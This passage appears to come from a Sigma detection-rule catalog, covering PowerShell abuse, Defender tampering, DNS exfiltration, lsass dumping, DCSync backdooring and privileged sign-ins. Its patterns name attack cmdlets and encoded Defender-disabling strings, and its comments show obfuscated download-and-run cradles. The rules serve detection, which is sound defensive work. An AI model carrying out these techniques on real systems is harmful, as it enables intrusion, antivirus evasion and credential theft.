title: PowerShell as a Service in Registry
id: 4a5f5a5e-ac01-474b-9b4e-d61298c9df1d
status: test
description: Detects that a powershell code is written to the registry as a service.
references:
- https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
author: oscd.community, Natalia Shornikova
date: 2020-10-06
modified: 2023-08-17
tags:
- attack.execution
- attack.t1569.002
logsource:
category: registry_set
product: windows
detection:
selection:
TargetObject|contains: '\Services\'
TargetObject|endswith: '\ImagePath'
Details|contains:
- 'powershell'
- 'pwsh'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
PowerView PowerShell Cmdlets - ScriptBlock
Detects Cmdlet names from PowerView of the PowerSploit exploitation framework.
view Sigma YAML
title: PowerView PowerShell Cmdlets - ScriptBlock
id: dcd74b95-3f36-4ed9-9598-0490951643aa
related:
- id: b2317cfa-4a47-4ead-b3ff-297438c0bc2d
type: similar
status: test
description: Detects Cmdlet names from PowerView of the PowerSploit exploitation framework.
references:
- https://powersploit.readthedocs.io/en/stable/Recon/README
- https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
- https://thedfirreport.com/2020/10/08/ryuks-return
- https://adsecurity.org/?p=2277
author: Bhabesh Raj
date: 2021-05-18
modified: 2023-11-22
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains:
- 'Export-PowerViewCSV'
- 'Find-DomainLocalGroupMember'
- 'Find-DomainObjectPropertyOutlier'
- 'Find-DomainProcess'
- 'Find-DomainShare'
- 'Find-DomainUserEvent'
- 'Find-DomainUserLocation'
- 'Find-ForeignGroup'
- 'Find-ForeignUser'
- 'Find-GPOComputerAdmin'
- 'Find-GPOLocation'
- 'Find-InterestingDomain' # Covers: Find-InterestingDomainAcl, Find-InterestingDomainShareFile
- 'Find-InterestingFile'
- 'Find-LocalAdminAccess'
- 'Find-ManagedSecurityGroups'
- 'Get-CachedRDPConnection'
- 'Get-DFSshare'
- 'Get-DomainDFSShare'
- 'Get-DomainDNSRecord'
- 'Get-DomainDNSZone'
- 'Get-DomainFileServer'
- 'Get-DomainGPOComputerLocalGroupMapping'
- 'Get-DomainGPOLocalGroup'
- 'Get-DomainGPOUserLocalGroupMapping'
- 'Get-LastLoggedOn'
- 'Get-LoggedOnLocal'
- 'Get-NetFileServer'
- 'Get-NetForest' # Covers: Get-NetForestCatalog, Get-NetForestDomain, Get-NetForestTrust
- 'Get-NetGPOGroup'
- 'Get-NetProcess'
- 'Get-NetRDPSession'
- 'Get-RegistryMountedDrive'
- 'Get-RegLoggedOn'
- 'Get-WMIRegCachedRDPConnection'
- 'Get-WMIRegLastLoggedOn'
- 'Get-WMIRegMountedDrive'
- 'Get-WMIRegProxy'
- 'Invoke-ACLScanner'
- 'Invoke-CheckLocalAdminAccess'
- 'Invoke-EnumerateLocalAdmin'
- 'Invoke-EventHunter'
- 'Invoke-FileFinder'
- 'Invoke-Kerberoast'
- 'Invoke-MapDomainTrust'
- 'Invoke-ProcessHunter'
- 'Invoke-RevertToSelf'
- 'Invoke-ShareFinder'
- 'Invoke-UserHunter'
- 'Invoke-UserImpersonation'
- 'Remove-RemoteConnection'
- 'Request-SPNTicket'
- 'Resolve-IPAddress'
# - 'Get-ADObject' # prone to FPs
# - 'Get-Domain' # too many FPs # Covers Cmdlets like: DomainComputer, DomainController, DomainDFSShare, DomainDNSRecord, DomainGPO, etc.
# - 'Add-DomainGroupMember'
# - 'Add-DomainObjectAcl'
# - 'Add-ObjectAcl'
# - 'Add-RemoteConnection'
# - 'Convert-ADName'
# - 'Convert-NameToSid'
# - 'ConvertFrom-UACValue'
# - 'ConvertTo-SID'
# - 'Get-DNSRecord'
# - 'Get-DNSZone'
# - 'Get-DomainComputer'
# - 'Get-DomainController'
# - 'Get-DomainGroup'
# - 'Get-DomainGroupMember'
# - 'Get-DomainManagedSecurityGroup'
# - 'Get-DomainObject'
# - 'Get-DomainObjectAcl'
# - 'Get-DomainOU'
# - 'Get-DomainPolicy'
# - 'Get-DomainSID'
# - 'Get-DomainSite'
# - 'Get-DomainSPNTicket'
# - 'Get-DomainSubnet'
# - 'Get-DomainUser'
# - 'Get-DomainUserEvent'
# - 'Get-Forest' # Covers: Get-ForestDomain, Get-ForestGlobalCatalog, Get-ForestTrust
# - 'Get-IPAddress'
# - 'Get-NetComputer' # Covers: Get-NetComputerSiteName
# - 'Get-NetDomain' # Covers: Get-NetDomainController, Get-NetDomainTrust
# - 'Get-NetGroup' # Covers: Get-NetGroupMember
# - 'Get-NetLocalGroup' # Covers: NetLocalGroupMember
# - 'Get-NetLoggedon'
# - 'Get-NetOU'
# - 'Get-NetSession'
# - 'Get-NetShare'
# - 'Get-NetSite'
# - 'Get-NetSubnet'
# - 'Get-NetUser'
# - 'Get-ObjectAcl'
# - 'Get-PathAcl'
# - 'Get-Proxy'
# - 'Get-SiteName'
# - 'Get-UserEvent'
# - 'Get-WMIProcess'
# - 'New-DomainGroup'
# - 'New-DomainUser'
# - 'Set-ADObject'
# - 'Set-DomainObject'
# - 'Set-DomainUserPassword'
# - 'Test-AdminAccess'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Powershell Add Name Resolution Policy Table Rule
Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.
This will bypass the default DNS server and uses a specified server for answering the query.
view Sigma YAML
title: Powershell Add Name Resolution Policy Table Rule
id: 4368354e-1797-463c-bc39-a309effbe8d7
status: test
description: |
Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.
This will bypass the default DNS server and uses a specified server for answering the query.
references:
- https://twitter.com/NathanMcNulty/status/1569497348841287681
- https://learn.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps
author: Borna Talebi
date: 2021-09-14
modified: 2022-10-09
tags:
- attack.impact
- attack.t1565
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'Add-DnsClientNrptRule'
- '-Namesp'
- '-NameSe'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Powershell Base64 Encoded MpPreference Cmdlet
Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV
view Sigma YAML
title: Powershell Base64 Encoded MpPreference Cmdlet
id: c6fb44c6-71f5-49e6-9462-1425d328aee3
status: test
description: Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV
references:
- https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
- https://twitter.com/AdamTheAnalyst/status/1483497517119590403
author: Florian Roth (Nextron Systems)
date: 2022-03-04
modified: 2023-01-30
tags:
- attack.defense-impairment
- attack.t1685
logsource:
category: process_creation
product: windows
detection:
selection:
- CommandLine|base64offset|contains:
- 'Add-MpPreference '
- 'Set-MpPreference '
- 'add-mppreference '
- 'set-mppreference '
- CommandLine|contains:
# UTF16-LE
- 'QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA'
- 'EAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA'
- 'BAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA'
- 'UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgA'
- 'MAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIA'
- 'TAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA'
- 'YQBkAGQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA'
- 'EAZABkAC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA'
- 'hAGQAZAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA'
- 'cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgA'
- 'MAZQB0AC0AbQBwAHAAcgBlAGYAZQByAGUAbgBjAGUAIA'
- 'zAGUAdAAtAG0AcABwAHIAZQBmAGUAcgBlAG4AYwBlACAA'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Powershell DNSExfiltration
DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel
view Sigma YAML
title: Powershell DNSExfiltration
id: d59d7842-9a21-4bc6-ba98-64bfe0091355
status: test
description: DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh
- https://github.com/Arno0x/DNSExfiltrator
author: frack113
date: 2022-01-07
tags:
- attack.exfiltration
- attack.t1048
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection_cmdlet:
- ScriptBlockText|contains: 'Invoke-DNSExfiltrator'
- ScriptBlockText|contains|all:
- ' -i '
- ' -d '
- ' -p '
- ' -doh '
- ' -t '
condition: selection_cmdlet
falsepositives:
- Legitimate script
level: high
Convert to SIEM query
high
Powershell Defender Disable Scan Feature
Detects requests to disable Microsoft Defender features using PowerShell commands
view Sigma YAML
title: Powershell Defender Disable Scan Feature
id: 1ec65a5f-9473-4f12-97da-622044d6df21
status: test
description: Detects requests to disable Microsoft Defender features using PowerShell commands
references:
- https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps
- https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE
- https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files
author: Florian Roth (Nextron Systems)
date: 2022-03-03
modified: 2024-01-02
tags:
- attack.defense-impairment
- attack.t1685
logsource:
category: process_creation
product: windows
detection:
selection_cli_cmdlet:
CommandLine|contains:
- 'Add-MpPreference '
- 'Set-MpPreference '
selection_cli_option:
CommandLine|contains:
- 'DisableArchiveScanning '
- 'DisableRealtimeMonitoring '
- 'DisableIOAVProtection '
- 'DisableBehaviorMonitoring '
- 'DisableBlockAtFirstSeen '
- 'DisableCatchupFullScan '
- 'DisableCatchupQuickScan '
selection_cli_value:
CommandLine|contains:
- '$true'
- ' 1 '
selection_encoded_modifier:
CommandLine|base64offset|contains:
# Note: Since this is calculating offsets casing is important
- 'disablearchivescanning '
- 'DisableArchiveScanning '
- 'disablebehaviormonitoring '
- 'DisableBehaviorMonitoring '
- 'disableblockatfirstseen '
- 'DisableBlockAtFirstSeen '
- 'disablecatchupfullscan '
- 'DisableCatchupFullScan '
- 'disablecatchupquickscan '
- 'DisableCatchupQuickScan '
- 'disableioavprotection '
- 'DisableIOAVProtection '
- 'disablerealtimemonitoring '
- 'DisableRealtimeMonitoring '
selection_encoded_direct:
CommandLine|contains:
- 'RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA'
- 'QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA'
- 'EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA'
- 'RABpAHMAYQBiAGwAZQBJAE8AQQBWAFAAcgBvAHQAZQBjAHQAaQBvAG4AIA'
- 'QAaQBzAGEAYgBsAGUASQBPAEEAVgBQAHIAbwB0AGUAYwB0AGkAbwBuACAA'
- 'EAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgA'
- 'RABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgA'
- 'QAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAIA'
- 'EAGkAcwBhAGIAbABlAEIAZQBoAGEAdgBpAG8AcgBNAG8AbgBpAHQAbwByAGkAbgBnACAA'
- 'RABpAHMAYQBiAGwAZQBCAGwAbwBjAGsAQQB0AEYAaQByAHMAdABTAGUAZQBuACAA'
- 'QAaQBzAGEAYgBsAGUAQgBsAG8AYwBrAEEAdABGAGkAcgBzAHQAUwBlAGUAbgAgA'
- 'EAGkAcwBhAGIAbABlAEIAbABvAGMAawBBAHQARgBpAHIAcwB0AFMAZQBlAG4AIA'
- 'ZABpAHMAYQBiAGwAZQByAGUAYQBsAHQAaQBtAGUAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA'
- 'QAaQBzAGEAYgBsAGUAcgBlAGEAbAB0AGkAbQBlAG0AbwBuAGkAdABvAHIAaQBuAGcAIA'
- 'kAGkAcwBhAGIAbABlAHIAZQBhAGwAdABpAG0AZQBtAG8AbgBpAHQAbwByAGkAbgBnACAA'
- 'ZABpAHMAYQBiAGwAZQBpAG8AYQB2AHAAcgBvAHQAZQBjAHQAaQBvAG4AIA'
- 'QAaQBzAGEAYgBsAGUAaQBvAGEAdgBwAHIAbwB0AGUAYwB0AGkAbwBuACAA'
- 'kAGkAcwBhAGIAbABlAGkAbwBhAHYAcAByAG8AdABlAGMAdABpAG8AbgAgA'
- 'ZABpAHMAYQBiAGwAZQBiAGUAaABhAHYAaQBvAHIAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA'
- 'QAaQBzAGEAYgBsAGUAYgBlAGgAYQB2AGkAbwByAG0AbwBuAGkAdABvAHIAaQBuAGcAIA'
- 'kAGkAcwBhAGIAbABlAGIAZQBoAGEAdgBpAG8AcgBtAG8AbgBpAHQAbwByAGkAbgBnACAA'
- 'ZABpAHMAYQBiAGwAZQBiAGwAbwBjAGsAYQB0AGYAaQByAHMAdABzAGUAZQBuACAA'
- 'QAaQBzAGEAYgBsAGUAYgBsAG8AYwBrAGEAdABmAGkAcgBzAHQAcwBlAGUAbgAgA'
- 'kAGkAcwBhAGIAbABlAGIAbABvAGMAawBhAHQAZgBpAHIAcwB0AHMAZQBlAG4AIA'
- 'RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAEYAdQBsAGwAUwBjAGEAbgA'
- 'RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAFEAdQBpAGMAawBTAGMAYQBuAA'
- 'RABpAHMAYQBiAGwAZQBBAHIAYwBoAGkAdgBlAFMAYwBhAG4AbgBpAG4AZwA'
condition: all of selection_cli_* or 1 of selection_encoded_*
falsepositives:
- Possible administrative activity
- Other Cmdlets that may use the same parameters
level: high
Convert to SIEM query
high
Powershell Install a DLL in System Directory
Uses PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64"
view Sigma YAML
title: Powershell Install a DLL in System Directory
id: 63bf8794-9917-45bc-88dd-e1b5abc0ecfd
status: test
description: Uses PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64"
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll
author: frack113, Nasreddine Bencherchali (Nextron Systems)
date: 2021-12-27
modified: 2024-01-22
tags:
- attack.persistence
- attack.credential-access
- attack.defense-impairment
- attack.t1556.002
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|re: '(Copy-Item|cpi) .{2,128} -Destination .{1,32}\\Windows\\(System32|SysWOW64)'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Powershell Token Obfuscation - Process Creation
Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
view Sigma YAML
title: Powershell Token Obfuscation - Process Creation
id: deb9b646-a508-44ee-b7c9-d8965921c6b6
related:
- id: f3a98ce4-6164-4dd4-867c-4d83de7eca51
type: similar
status: test
description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
references:
- https://github.com/danielbohannon/Invoke-Obfuscation
author: frack113
date: 2022-12-27
modified: 2026-03-16
tags:
- attack.stealth
- attack.t1027.009
logsource:
category: process_creation
product: windows
detection:
selection:
# Examples:
# IN`V`o`Ke-eXp`ResSIOn (Ne`W-ob`ject Net.WebClient).DownloadString
# &('In'+'voke-Expressi'+'o'+'n') (.('New-Ob'+'jec'+'t') Net.WebClient).DownloadString
# &("{2}{3}{0}{4}{1}"-f 'e','Expression','I','nvok','-') (&("{0}{1}{2}"-f'N','ew-O','bject') Net.WebClient).DownloadString
- CommandLine|re: '\w+`(?:\w+|-|.)`[\w+|\s]'
# - CommandLine|re: '\((\'(\w|-|\.)+\'\+)+\'(\w|-|\.)+\'\)' TODO: fixme
- CommandLine|re: '"(?:\{\d\})+"\s*-f'
# ${e`Nv:pATh}
- CommandLine|re: '(?i)\$\{`?e`?n`?v`?:`?p`?a`?t`?h`?\}'
filter_main_envpath:
CommandLine|contains: '${env:path}'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Powerview Add-DomainObjectAcl DCSync AD Extend Right
Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer
view Sigma YAML
title: Powerview Add-DomainObjectAcl DCSync AD Extend Right
id: 2c99737c-585d-4431-b61a-c911d86ff32f
status: test
description: Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer
references:
- https://twitter.com/menasec1/status/1111556090137903104
- https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf
author: Samir Bousseaden, Roberto Rodriguez @Cyb3rWard0g, oscd.community, Tim Shelton, Maxence Fossat
date: 2019-04-03
modified: 2022-08-16
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1098
logsource:
product: windows
service: security
definition: 'Requirements: The "Audit Directory Service Changes" logging policy must be configured in order to receive events. Audit events are generated only for objects with configured system access control lists (SACLs). Audit events are generated only for objects with configured system access control lists (SACLs) and only when accessed in a manner that matches their SACL settings. This policy covers the following events ids - 5136, 5137, 5138, 5139, 5141. Note that the default policy does not cover User objects. For that a custom AuditRule need to be setup (See https://github.com/OTRF/Set-AuditRule)'
detection:
selection:
EventID: 5136
AttributeLDAPDisplayName: 'ntSecurityDescriptor'
AttributeValue|contains:
- '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'
- '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'
- '89e95b76-444d-4c62-991a-0facbeda640c'
filter_main_dns_object_class:
ObjectClass:
- 'dnsNode'
- 'dnsZoneScope'
- 'dnsZone'
condition: selection and not 1 of filter_main_*
falsepositives:
- New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account.
level: high
Convert to SIEM query
high
Prefetch File Deleted
Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
view Sigma YAML
title: Prefetch File Deleted
id: 0a1f9d29-6465-4776-b091-7f43b26e4c89
status: test
description: Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence
references:
- Internal Research
- https://www.group-ib.com/blog/hunting-for-ttps-with-prefetch-files/
author: Cedric MAURUGEON
date: 2021-09-29
modified: 2024-01-25
tags:
- attack.stealth
- attack.t1070.004
logsource:
product: windows
category: file_delete
detection:
selection:
TargetFilename|contains: ':\Windows\Prefetch\'
TargetFilename|endswith: '.pf'
filter_main_svchost:
Image|endswith: ':\windows\system32\svchost.exe'
User|contains: # covers many language settings
- 'AUTHORI'
- 'AUTORI'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Primary Refresh Token Access Attempt
Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft
view Sigma YAML
title: Primary Refresh Token Access Attempt
id: a84fc3b1-c9ce-4125-8e74-bdcdb24021f1
status: test
description: Indicates access attempt to the PRT resource which can be used to move laterally into an organization or perform credential theft
references:
- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#possible-attempt-to-access-primary-refresh-token-prt
- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-07
tags:
- attack.t1528
- attack.credential-access
logsource:
product: azure
service: riskdetection
detection:
selection:
riskEventType: 'attemptedPrtAccess'
condition: selection
falsepositives:
- This detection is low-volume and is seen infrequently in most organizations. When this detection appears it's high risk, and users should be remediated.
level: high
Convert to SIEM query
high
PrintBrm ZIP Creation of Extraction
Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
view Sigma YAML
title: PrintBrm ZIP Creation of Extraction
id: cafeeba3-01da-4ab4-b6c4-a31b1d9730c7
status: test
description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
references:
- https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/
author: frack113
date: 2022-05-02
tags:
- attack.command-and-control
- attack.stealth
- attack.t1105
- attack.t1564.004
logsource:
product: windows
category: process_creation
detection:
selection:
Image|endswith: '\PrintBrm.exe'
CommandLine|contains|all:
- ' -f'
- '.zip'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Privilege Escalation via Named Pipe Impersonation
Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.
view Sigma YAML
title: Privilege Escalation via Named Pipe Impersonation
id: 9bd04a79-dabe-4f1f-a5ff-92430265c96b
related:
- id: f35c5d71-b489-4e22-a115-f003df287317
type: derived
status: test
description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.
references:
- https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html
author: Tim Rauch, Elastic (idea)
date: 2022-09-27
modified: 2022-12-30
tags:
- attack.lateral-movement
- attack.t1021
logsource:
category: process_creation
product: windows
detection:
selection_name:
- Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
- OriginalFileName:
- 'Cmd.Exe'
- 'PowerShell.EXE'
selection_args:
CommandLine|contains|all:
- 'echo'
- '>'
- '\\\\.\\pipe\\'
condition: all of selection*
falsepositives:
- Other programs that cause these patterns (please report)
level: high
Convert to SIEM query
high
Privilege Role Elevation Not Occuring on SAW or PAW
Detects failed sign-in from a PAW or SAW device
view Sigma YAML
title: Privilege Role Elevation Not Occuring on SAW or PAW
id: 38a5e67b-436a-4e77-9f73-f48a82626890
status: test
description: Detects failed sign-in from a PAW or SAW device
references:
- https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor
author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
date: 2022-08-11
modified: 2023-12-15
tags:
- attack.privilege-escalation
- attack.initial-access
- attack.persistence
- attack.stealth
- attack.t1078
logsource:
product: azure
service: signinlogs
detection:
# You have to tune the rule for your environment before use it
selection:
properties.message|contains: Add memmber to role completed (PIM aciviation)
# Countries you DO operate out of e,g GB, use list for mulitple
Location|expand: '%LegitCountries%'
IPaddress|expand: '%UnApprovedIp%'
# unapproved browser, operating system
DeviceInfo|expand: '%UnApprovedDevice%'
DeviceDetail.isCompliant: 'false'
Status:
- Sucess
- failure
condition: selection
falsepositives:
- Not using a PAW/SAW in the environment
level: high
Convert to SIEM query
high
Privilege Role Sign-In Outside Expected Controls
Detects failed sign-in due to user not meeting expected controls for adminitrators
view Sigma YAML
title: Privilege Role Sign-In Outside Expected Controls
id: cf1e5687-84e1-41af-97a9-158094efef53
status: test
description: Detects failed sign-in due to user not meeting expected controls for adminitrators
references:
- https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor
author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
date: 2022-08-11
modified: 2023-12-15
tags:
- attack.initial-access
- attack.persistence
- attack.privilege-escalation
- attack.stealth
- attack.t1078
logsource:
product: azure
service: signinlogs
detection:
# You have to tune the rule for your environment before use it
selection:
Status: failure
# Countries you do NOT operate out of e,g GB, use list for mulitple
Location|expand: '%UnLegitCountries%'
IPaddress|expand: '%UnApprovedIp%'
# unapproved browser, operating system
DeviceInfo|expand: '%UnApprovedDevice%'
condition: selection
falsepositives:
- A legit admin not following proper processes
level: high
Convert to SIEM query
high
Privilege Role Sign-In Outside Of Normal Hours
Detects account sign ins outside of normal hours or uncommon locations. Administrator accounts should be investigated
view Sigma YAML
title: Privilege Role Sign-In Outside Of Normal Hours
id: e927a2f5-e7af-424f-ace7-70ebb49e8976
status: test
description: Detects account sign ins outside of normal hours or uncommon locations. Administrator accounts should be investigated
references:
- https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor
author: Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'
date: 2022-08-11
modified: 2023-12-15
tags:
- attack.persistence
- attack.initial-access
- attack.privilege-escalation
- attack.stealth
- attack.t1078
logsource:
product: azure
service: signinlogs
detection:
# You need to tune the rule for your enrivonnement before use
selection:
Status: Sucess
# Countries you DO operate out of e,g GB, use list for mulitple
Location|expand: '%LegitCountries%'
# outside normal working hours
Date|expand: '%ClosingTime%'
Initiatied.By|expand: '%ApprovedUserUpn%'
condition: selection
falsepositives:
- An admin doing actual work outside of normal business hours
level: high
Convert to SIEM query
high
Privileged User Has Been Created
Detects the addition of a new user to a privileged group such as "root" or "sudo"
view Sigma YAML
title: Privileged User Has Been Created
id: 0ac15ec3-d24f-4246-aa2a-3077bb1cf90e
status: test
description: Detects the addition of a new user to a privileged group such as "root" or "sudo"
references:
- https://digital.nhs.uk/cyber-alerts/2018/cc-2825
- https://linux.die.net/man/8/useradd
- https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid
author: Pawel Mazur
date: 2022-12-21
modified: 2025-01-21
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1136.001
- attack.t1098
logsource:
product: linux
definition: '/var/log/secure on REHL systems or /var/log/auth.log on debian like Systems needs to be collected in order for this detection to work'
detection:
# Example of the events that could be observed when matching these would be as follow
# Dec 21 16:42:19 testserver useradd[1337]: new user: name=butter1, UID=1000, GID=0, home=/root, shell=/bin/bash
# Dec 21 17:13:54 testserver useradd[1337]: new user: name=john, UID=0, GID=0, home=/home/john, shell=/bin/bash
# Dec 21 17:24:40 testserver useradd[1337]: new user: name=butter3, UID=1000, GID=10, home=/home/butter3, shell=/bin/bash
# Dec 21 17:30:22 testserver useradd[1337]: new user: name=butter4, UID=1000, GID=27, home=/home/butter4, shell=/bin/bash
selection_new_user:
- 'new user'
selection_uids_gids:
- 'GID=0,' # root group
- 'UID=0,' # root UID
- 'GID=10,' # wheel group
- 'GID=27,' # sudo group
condition: all of selection_*
falsepositives:
- Administrative activity
level: high
Convert to SIEM query
high
Process Access via TrolleyExpress Exclusion
Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
view Sigma YAML
title: Process Access via TrolleyExpress Exclusion
id: 4c0aaedc-154c-4427-ada0-d80ef9c9deb6
status: test
description: Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
references:
- https://twitter.com/_xpn_/status/1491557187168178176
- https://www.youtube.com/watch?v=Ie831jF0bb0
author: Florian Roth (Nextron Systems)
date: 2022-02-10
modified: 2022-05-13
tags:
- attack.stealth
- attack.t1218.011
- attack.credential-access
- attack.t1003.001
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
# We assume that the lsass.exe process has a process ID that's between 700 and 999 and the dumper uses just the PID as parameter
- '\TrolleyExpress 7'
- '\TrolleyExpress 8'
- '\TrolleyExpress 9'
- '\TrolleyExpress.exe 7'
- '\TrolleyExpress.exe 8'
- '\TrolleyExpress.exe 9'
# Common dumpers
- '\TrolleyExpress.exe -ma '
renamed:
Image|endswith: '\TrolleyExpress.exe'
filter_renamed:
OriginalFileName|contains: 'CtxInstall'
filter_empty:
OriginalFileName: null
condition: selection or ( renamed and not 1 of filter* )
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Process Execution Error In JVM Based Application
Detects process execution related exceptions in JVM based apps, often relates to RCE
view Sigma YAML
title: Process Execution Error In JVM Based Application
id: d65f37da-a26a-48f8-8159-3dde96680ad2
status: test
description: Detects process execution related exceptions in JVM based apps, often relates to RCE
references:
- https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs
author: Moti Harmats
date: 2023-02-11
tags:
- attack.initial-access
- attack.t1190
logsource:
category: application
product: jvm
definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)'
detection:
keywords:
- 'Cannot run program'
- 'java.lang.ProcessImpl'
- 'java.lang.ProcessBuilder'
condition: keywords
falsepositives:
- Application bugs
level: high
Convert to SIEM query
high
Process Execution From A Potentially Suspicious Folder
Detects a potentially suspicious execution from an uncommon folder.
view Sigma YAML
title: Process Execution From A Potentially Suspicious Folder
id: 3dfd06d2-eaf4-4532-9555-68aca59f57c4
status: test
description: Detects a potentially suspicious execution from an uncommon folder.
references:
